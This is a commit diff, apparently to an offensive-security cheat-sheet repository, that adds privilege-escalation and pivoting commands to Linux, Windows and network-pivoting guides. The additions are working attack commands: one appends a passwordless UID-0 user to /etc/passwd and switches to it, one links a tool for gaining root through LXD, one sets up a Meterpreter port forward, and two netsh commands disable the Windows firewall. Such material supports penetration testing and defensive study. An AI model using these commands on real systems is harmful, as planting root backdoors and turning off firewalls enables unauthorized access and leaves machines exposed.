GraphQL + LXD/etc/passwd PrivEsc + Win firewall

Methodology and Resources/Linux - Privilege Escalation.md

@@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
 You can now use the `su` command with `hacker:hacker`
 
+Alternatively you can use the following lines to add a dummy user without a password.    
+WARNING: you might degrade the current security of the machine.
+
+```powershell
+echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
+su - dummy
+```
+
 
 ## NFS Root Squashing
 
@@ -526,6 +534,8 @@ lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 
+Alternatively https://github.com/initstring/lxd_root
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)

Methodology and Resources/Network Pivoting Techniques.md

@@ -85,6 +85,7 @@ optional arguments:
 
 ```c
 portfwd list
+portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 
 or

Methodology and Resources/Windows - Privilege Escalation.md

@@ -172,6 +172,13 @@ List firewall's blocked ports
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 
+Disable firewall
+
+```powershell
+netsh firewall set opmode disable
+netsh advfirewall set allprofiles state off
+```
+
 List all network shares
 
 ```powershell